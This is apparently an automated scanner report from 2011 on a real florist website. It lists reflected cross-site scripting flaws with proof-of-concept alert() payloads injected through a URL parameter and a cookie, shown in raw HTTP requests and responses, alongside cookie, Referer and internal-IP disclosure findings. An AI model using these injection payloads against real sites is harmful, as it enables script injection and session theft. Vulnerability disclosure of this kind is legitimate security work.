XSS, Cross Site Scripting, CAPEC-86, www.floristexpress.net

CAPEC-86: Embedding Script (XSS ) in HTTP Headers | Vulnerability Crawler Report

Report generated by XSS.CX Research Blog at Fri Feb 11 13:15:24 CST 2011.


Loading

1. Cross-site scripting (reflected)

1.1. http://www.floristexpress.net/ [refcode parameter]

1.2. http://www.floristexpress.net/products/tulip_rainbow.htm [ref_code cookie]

2. Cookie without HttpOnly flag set

3. Referer-dependent response

4. Cross-domain Referer leakage

5. Cross-domain script include

5.1. http://www.floristexpress.net/

5.2. http://www.floristexpress.net/cart.htm

5.3. http://www.floristexpress.net/products/tulip_rainbow.htm

6. Private IP addresses disclosed

6.1. http://www.floristexpress.net/

6.2. http://www.floristexpress.net/cart.htm

6.3. http://www.floristexpress.net/products/tulip_rainbow.htm



1. Cross-site scripting (reflected)  next
There are 2 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.floristexpress.net/ [refcode parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.floristexpress.net
Path:   /

Issue detail

The value of the refcode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b295e"%3balert(1)//b7f69ae6950 was submitted in the refcode parameter. This input was echoed as b295e";alert(1)//b7f69ae6950 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?refcode=ORDb295e"%3balert(1)//b7f69ae6950&RefPage=pfc_PRODUCT-30050119 HTTP/1.1
Host: www.floristexpress.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rrefbdf\%22%3balert(document.cookie)//5e820bfb5e
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=IZJPJPS192.168.100.163CKOWO; path=/
Date: Fri, 11 Feb 2011 18:54:01 GMT
Server: Apache
Set-Cookie: PHPSESSID=f5bd434039a4b158c8c4c53fc2d56586; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=a4f657633e93d2b0ff275b5f8026f4ac; path=/
Set-Cookie: ref_code=ORDB295E%22%3BALERT%281%29%2F%2FB7F69AE6950; path=/
Content-Type: text/html
Content-Length: 102831

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Same Day Flower Delivery by Florist E
...[SNIP]...
.eVar9="";
s.eVar13="";
s.eVar14="";
s.eVar18="";
s.eVar22="10:30AM";
s.eVar24="";
s.eVar25="";
s.eVar26="";
s.eVar27="";
s.eVar28="";
s.eVar29="";
s.eVar30="";
s.eVar31="";
s.eVar33="B";
s.eVar36="ORDB295E";ALERT(1)//B7F69AE6950";
s.eVar40="";
s.eVar47="";

s.products="";

s.state="";
s.zip="";
s.purchaseID="";

var s_code=s.t();if(s_code)document.write(s_code);
</script>
...[SNIP]...

1.2. http://www.floristexpress.net/products/tulip_rainbow.htm [ref_code cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.floristexpress.net
Path:   /products/tulip_rainbow.htm

Issue detail

The value of the ref_code cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8173"%3balert(1)//95ac6cbaf33c38076 was submitted in the ref_code cookie. This input was echoed as e8173";alert(1)//95ac6cbaf33c38076 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products/tulip_rainbow.htm?order_prod_num=FYF-MIXTUL&order_prod_size=r&order_upgrds%5Bm%5D%5Bqty%5D=&order_upgrds%5Bm%5D%5Bopt%5D=&order_upgrds%5Bl%5D%5Bqty%5D=&order_upgrds%5Bl%5D%5Bopt%5D=&order_upgrds%5Bc%5D%5Bopt%5D=&order_upgrds%5Bt%5D%5Bopt%5D=&order_d_card_type=Blank+Card&order_d_recip=&remLen=175&order_d_card_msg=&remChars=175&order_d_card_sig=&order_d_zip=&continue.x=66&continue.y=20 HTTP/1.1
Host: www.floristexpress.net
Proxy-Connection: keep-alive
Referer: http://www.floristexpress.net/products/tulip_rainbow.htm
Cache-Control: max-age=0
Origin: http://www.floristexpress.net
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=IZJPJPS192.168.100.70CKOMM; PHPSESSID=be5eceddad9804e3c8f89291e0dce73f; ref_code=ORDe8173"%3balert(1)//95ac6cbaf33c38076; s_cc=true; s_sq=proflodevelopment%3D%2526pid%253Dfle%25253Aproduct%25253AFYF-MIXTUL%2526pidt%253D1%2526oid%253Dhttp%25253A//a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/btn_buynow.jpg%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 18:55:35 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=c2d443072044e030c1ee1ec63640d40a; path=/
Content-Type: text/html
Content-Length: 32960

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Tulip Rainbow at FloristExpress.Net<
...[SNIP]...
.eVar9="";
s.eVar13="";
s.eVar14="";
s.eVar18="";
s.eVar22="10:30AM";
s.eVar24="";
s.eVar25="";
s.eVar26="";
s.eVar27="";
s.eVar28="";
s.eVar29="";
s.eVar30="";
s.eVar31="";
s.eVar33="D";
s.eVar36="ORDe8173";alert(1)//95ac6cbaf33c38076";
s.eVar40="";
s.eVar47="";

s.products=";FYF-MIXTUL;;;event5=1;";

s.state="";
s.zip="";
s.purchaseID="";

var s_code=s.t();if(s_code)document.write(s_code);
</script>
...[SNIP]...

2. Cookie without HttpOnly flag set  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.floristexpress.net
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

Request

GET /?refcode=ORD&RefPage=pfc_PRODUCT-30050119 HTTP/1.1
Host: www.floristexpress.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rrefbdf\%22%3balert(document.cookie)//5e820bfb5e
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=IZJPJPS192.168.100.210CKOUU; path=/
Date: Fri, 11 Feb 2011 18:53:51 GMT
Server: Apache
Set-Cookie: PHPSESSID=68ab3544b96e60a3e65d7fb635fc5b2a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=227e64ab9387a195da7e801f19393cb9; path=/
Set-Cookie: ref_code=ORD; path=/
Content-Type: text/html
Content-Length: 102803

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Same Day Flower Delivery by Florist E
...[SNIP]...

3. Referer-dependent response  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.floristexpress.net
Path:   /

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defenses against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defenses against malicious input should be employed here as for any other kinds of user-supplied data.

Request 1

GET /?refcode=ORD&RefPage=pfc_PRODUCT-30050119 HTTP/1.1
Host: www.floristexpress.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rrefbdf\%22%3balert(document.cookie)//5e820bfb5e
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Set-Cookie: ARPT=IZJPJPS192.168.100.210CKOUU; path=/
Date: Fri, 11 Feb 2011 18:53:51 GMT
Server: Apache
Set-Cookie: PHPSESSID=68ab3544b96e60a3e65d7fb635fc5b2a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=227e64ab9387a195da7e801f19393cb9; path=/
Set-Cookie: ref_code=ORD; path=/
Content-Type: text/html
Content-Length: 102803

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Same Day Flower Delivery by Florist E
...[SNIP]...
<area shape="rect" coords="10,12,208,50" href="http://www.proflowers.com/?ref=FloristExpressLinkback" />
<area shape="rect" coords="828,8,980,50" href="http://www.proflowers.com/?ref=FloristExpressLinkback" />
</map>
<table border="0" cellspacing="0" cellpadding="0" width="988" align="center" style="background-color: #ffffff;">
<tr valign="top"><td><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/header/pro.jpg" border="0" usemap="#header_map"></td></tr>
<tr>
<td class="mainCell">
<div id="navPad">
<script language="javascript" type="text/javascript" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/js/topNav.js"></script>
<div id="navContainer">
<ul id="nav">
<li id="navSeasonal"><a href="http://www.floristexpress.net/search.htm?cat=valentine%27s+day">Valentine's Day</a>
<ul>
<li><a href="http://www.floristexpress.net/search.htm?cat=valentine%27s+day">Favorites</a></li>
<li><a href="http://www.floristexpress.net/search.htm?cat=valentine%27s+day">Flowers</a></li>
<li><a href="http://www.floristexpress.net/search.htm?cat=gift+baskets">Gift Baskets</a></li>
<li><a href="http://www.floristexpress.net/search.htm?cat=value">Gifts Under $50</a></li>
</ul>
</li>
<li><a href="#">Occasion</a>
<ul>
<li><a href="http://www.floristexpress.net/search.htm?cat=valentine%27s+day">Valentine's Day - 2/14</a></li>
<li><a href="http://www.floristexpress.net/search.htm?cat=birthday">Birthday</a></li>
<li><a href="http://www.floristexpress.net/search.htm?cat=funeral">Funeral</a></li>
<li><a href="http://www.floristexpress.net/search.htm?cat=anniversary">Anniversary</a></li>
<li><a href="http://www.floristexpress.net/search.htm?cat=just+because">Just Because</a></li>
<li><a href="http://www.floristexpress.net/search.htm?cat=get+well">Get Well</a></li>
<li><a hr
...[SNIP]...

Request 2

GET /?refcode=ORD&RefPage=pfc_PRODUCT-30050119 HTTP/1.1
Host: www.floristexpress.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Set-Cookie: ARPT=IZJPJPS192.168.100.163CKOWO; path=/
Date: Fri, 11 Feb 2011 18:53:55 GMT
Server: Apache
Set-Cookie: PHPSESSID=8fa2489137be2b3bf366593205f05fba; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=b69fd6a5e114e96d2cd65739b94ab2ca; path=/
Set-Cookie: ref_code=ORD; path=/
Content-Type: text/html
Content-Length: 103484

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Same Day Flower Delivery by Florist E
...[SNIP]...
<area shape="rect" coords="0,0,988,83" href="http://www.floristexpress.net/index.htm" />
</map>
<table border="0" cellspacing="0" cellpadding="0" width="988" align="center" style="background-color: #ffffff;">
<tr valign="top"><td><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/header/fe.jpg" border="0" usemap="#header_map"></td></tr>
<tr>
<td class="mainCell">
<div id="navPad">
<script language="javascript" type="text/javascript" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/js/topNav.js"></script>
<div id="navContainer">
<ul id="nav">
<li id="navSeasonal"><a href="http://www.floristexpress.net/search.htm?cat=valentine%27s+day">Valentine's Day</a>
<ul>
<li><a href="http://www.floristexpress.net/search.htm?cat=valentine%27s+day">Favorites</a></li>
<li><a href="http://www.floristexpress.net/search.htm?cat=valentine%27s+day">Flowers</a></li>
<li><a href="http://www.floristexpress.net/search.htm?cat=gift+baskets">Gift Baskets</a></li>
<li><a href="http://www.floristexpress.net/search.htm?cat=value">Gifts Under $50</a></li>
</ul>
</li>
<li><a href="#">Occasion</a>
<ul>
<li><a href="http://www.floristexpress.net/search.htm?cat=valentine%27s+day">Valentine's Day - 2/14</a></li>
<li><a href="http://www.floristexpress.net/search.htm?cat=birthday">Birthday</a></li>
<li><a href="http://www.floristexpress.net/search.htm?cat=funeral">Funeral</a></li>
<li><a href="http://www.floristexpress.net/search.htm?cat=anniversary">Anniversary</a></li>
<li><a href="http://www.floristexpress.net/search.htm?cat=just+because">Just Because</a></li>
<li><a href="http://www.floristexpress.net/search.htm?cat=get+well">Get Well</a></li>
<li><a href="http://www.floristexpress.net/search.htm?cat=sympathy">Sympathy</a></li>
<li><a href="http://www.floristexpress
...[SNIP]...

4. Cross-domain Referer leakage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.floristexpress.net
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

Request

GET /?refcode=ORD&RefPage=pfc_PRODUCT-30050119 HTTP/1.1
Host: www.floristexpress.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rrefbdf\%22%3balert(document.cookie)//5e820bfb5e
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=IZJPJPS192.168.100.210CKOUU; path=/
Date: Fri, 11 Feb 2011 18:53:51 GMT
Server: Apache
Set-Cookie: PHPSESSID=68ab3544b96e60a3e65d7fb635fc5b2a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=227e64ab9387a195da7e801f19393cb9; path=/
Set-Cookie: ref_code=ORD; path=/
Content-Type: text/html
Content-Length: 102803

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Same Day Flower Delivery by Florist E
...[SNIP]...
<!-- Same Day Flower Delivery -->
<link href="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/css/style.css" rel="styleSheet" type="text/css">
<link href="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/css/style_pro.css" rel="styleSheet" type="text/css">
</head>
...[SNIP]...
<map name="header_map">
<area shape="rect" coords="10,12,208,50" href="http://www.proflowers.com/?ref=FloristExpressLinkback" />
<area shape="rect" coords="828,8,980,50" href="http://www.proflowers.com/?ref=FloristExpressLinkback" />
</map>
...[SNIP]...
<td><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/header/pro.jpg" border="0" usemap="#header_map"></td>
...[SNIP]...
<div id="navPad">
<script language="javascript" type="text/javascript" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/js/topNav.js"></script>
...[SNIP]...
<li><a href="http://www.proflowers.com/?ref=FloristExpressLinkBackBarTest" class="navLinkExt">Back To ProFlowers</a>
...[SNIP]...
<td class="mainCell" style="padding: 3px 10px 5px 10px;">
<script language="javascript" type="text/javascript" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/js/products.js"></script>
...[SNIP]...
<td rowspan="2" id="featLeft" style="text-align: left;"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/hero/same_vday.jpg" border="0" /></td>
...[SNIP]...
<a href="/products/your_day_bouquet.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN1187A.jpg" border="0" /></a>
...[SNIP]...
<a href="/products/your_day_bouquet.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0" /></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/florist_designed_bouquet_2.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/FYF-VDA.jpg" border="0" alt="Not quite sure what to send? Let our top notch florists design a bouquet wi..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/florist_designed_bouquet_2.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/love_bouquet_2.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/FYF-DAISCARN.jpg" border="0" alt="These gorgeous pink and red carnations and white daisies arrive delicately..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/love_bouquet_2.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/tulip_rainbow.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/FYF-MIXTUL.jpg" border="0" alt="What a symphony of color and truly a sight to behold! A cheery and colorful..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/tulip_rainbow.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/rose_elegance_premium_dozen_roses-red.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN1120RDA.jpg" border="0" alt="Long-stem red roses are just the gift for the one you can trust, the one yo..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/rose_elegance_premium_dozen_roses-red.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/radiant_peruvian_lilies.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/FYF-MIXALST.jpg" border="0" alt="Give them a gift to remember with this radiant array of mixed colored peruv..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/radiant_peruvian_lilies.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/cheery_gerbera_daisies.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/FYF-GERB.jpg" border="0" alt="Like a ray of sunshine on a warm spring day, this glorious bouquet of brigh..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/cheery_gerbera_daisies.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/with_many_thanks.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN29-31J.jpg" border="0" alt="A beautiful way to express your gratitude, this stunning arrangement featur..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/with_many_thanks.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/radiant_red_tulips.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/FYF-REDTUL.jpg" border="0" alt="Reminiscent of a hillside in Holland, this dazzling display of velvety red..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/radiant_red_tulips.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/springtime_surprise.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN14-11J.jpg" border="0" alt="This rainbow of color will brighten anyone's day! Filled with gorgeous purp..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/springtime_surprise.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/sunny_get_well_wishes.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN621G.jpg" border="0" alt="Bring a little sunshine into the day of someone who is not feeling their be..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/sunny_get_well_wishes.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/its_your_birthday.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN23-11J.jpg" border="0" alt="A fabulous way to celebrate someone's birthday in an extraordinary way! Del..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/its_your_birthday.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/snappy_happy_birthday.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN23-21J.jpg" border="0" alt="Make them smile with this delightful collection of carnations, pink snapdra..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/snappy_happy_birthday.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/dish_garden_with_fresh_cuts.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN1870.jpg" border="0" alt="Send your warmest regards with an elegant dish garden that combines the fra..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/dish_garden_with_fresh_cuts.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/roses_n_rapture.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN71-21J.jpg" border="0" alt="Make a dramatic statement with a gorgeous array of red spray roses. Hand ar..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/roses_n_rapture.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
